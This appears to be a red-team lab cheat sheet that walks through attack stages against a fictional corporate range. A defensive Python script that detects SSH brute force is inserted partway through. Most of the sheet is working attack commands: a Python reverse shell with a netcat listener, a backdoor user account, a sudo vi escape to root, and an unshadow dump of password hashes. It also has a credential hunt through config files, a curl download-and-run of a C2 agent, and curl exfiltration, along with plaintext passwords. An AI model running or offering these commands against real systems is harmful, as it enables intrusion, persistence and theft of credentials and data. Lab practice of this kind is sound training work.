Linux SSH BruteForce
-> SSH with failed login attempt:
ssh emp1@CYBERWARFARE.CORP@10.10.10.6
Password: Wrong_Password
-> SSH with correct login attempt:
ssh emp1@CYBERWARFARE.CORP@10.10.10.6
Password: Serious@963
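A defender-side check for the SSH brute-force step above, added here as an example that is not part of the original notes: it parses OpenSSH auth-log lines (constructed sample lines with hypothetical host names and addresses) and flags any source that fails several password logins and then gets one accepted, which is the failed-then-correct pattern shown above.

```python
import re
from collections import defaultdict

# Constructed sample sshd log lines (hypothetical host names and addresses, not from the page).
SAMPLE_AUTH_LOG = """\
Mar 10 09:12:01 employee-rl1 sshd[2211]: Failed password for emp1@CYBERWARFARE.CORP from 10.10.10.9 port 51022 ssh2
Mar 10 09:12:03 employee-rl1 sshd[2212]: Failed password for emp1@CYBERWARFARE.CORP from 10.10.10.9 port 51023 ssh2
Mar 10 09:12:05 employee-rl1 sshd[2213]: Failed password for emp1@CYBERWARFARE.CORP from 10.10.10.9 port 51024 ssh2
Mar 10 09:12:08 employee-rl1 sshd[2214]: Accepted password for emp1@CYBERWARFARE.CORP from 10.10.10.9 port 51025 ssh2
Mar 10 09:15:00 employee-rl1 sshd[2300]: Failed password for invalid user admin from 10.10.10.20 port 40001 ssh2
Mar 10 09:40:00 employee-rl1 sshd[2400]: Accepted publickey for ops from 10.10.10.2 port 60001 ssh2
"""

# Matches both OpenSSH outcomes; "invalid user" is logged when the account does not exist locally.
SSHD_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)


def detect_ssh_bruteforce(log_text, threshold=3):
    """Return one alert per source IP that has at least `threshold` failed logins.

    Each alert carries the failure count, the user names tried, and whether a
    password login from the same source was accepted after those failures
    (wrong guesses followed by the correct password, as in the notes above).
    """
    state = defaultdict(lambda: {"failures": 0, "users": set(), "success_after_failures": False})
    for line in log_text.splitlines():
        m = SSHD_RE.search(line)
        if not m:
            continue  # unrelated log line
        entry = state[m["src"]]
        if m["result"] == "Failed":
            entry["failures"] += 1
            entry["users"].add(m["user"])
        elif entry["failures"] > 0 and m["method"] == "password":
            entry["success_after_failures"] = True
    return {
        src: {"failures": e["failures"], "users": sorted(e["users"]),
              "success_after_failures": e["success_after_failures"]}
        for src, e in state.items() if e["failures"] >= threshold
    }


if __name__ == "__main__":
    for src, alert in detect_ssh_bruteforce(SAMPLE_AUTH_LOG).items():
        print(src, alert)
```

A source with a single failure (10.10.10.20 in the sample) stays below the default threshold, and key-based logins never count as failures.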
Execution
-> Attacker Machine:
nc -nlvp 7777
-> On Compromised Machine (Employee-RL1):
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.150.3",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Persistence
Add User Account in Linux for persistence:
sudo useradd -p $(openssl passwd -1 password) support_388945a1
Privilege Escalation
Linux Sudo Abuse:
sudo -l
sudo /tmp/vi
Esc + :!/bin/bash
(presented with root)
Defense Evasion
sudo /tmp/vi
Esc + :!/bin/bash
(presented with root)
cd /opt/sensitive
chmod 777 /opt/sensitive
cat read.txt
Credential Access
/etc/shadow & /etc/passwd file dump:
unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db
Discovery
Internal Network Service Discovery:
nmap -sC 10.10.10.0/24 --top-ports 5
Lateral Movement
Access Remote machine by abusing Remote Services (SSH):
ssh -D 9999 emp1@CYBERWARFARE.CORP@10.10.10.3
Pass: Serious@963
Data Collection
Data from Local System:
find / -maxdepth 4 -name '*.conf' -type f -exec grep -Hn 'pass\|password\|login\|username\|email\|mail\|host\|ip' {} \; 2>/dev/null
Command & Control
Caldera C2 server Network Communication:
server="http://192.168.250.12:8888";curl -s -X POST -H "file:sandcat.go" -H "platform:linux" $server/file/download > sandcat.go;chmod +x sandcat.go;./sandcat.go -server $server -group red -v
Data Exfiltration
Exfiltration over Alternative Protocol (HTTP):
curl -d 'data=sensitivedata' http://192.168.250.12:8888/data
Multiple Techniques:
https://github.com/FortyNorthSecurity/Egress-Assess
Server: ./Egress-Assess.py --server https --username testuser --password pass123
Client: Invoke-EgressAssess -client https -IP -UserName testuser -Password pass123 -Datatype ssn
https://github.com/ytisf/PyExfil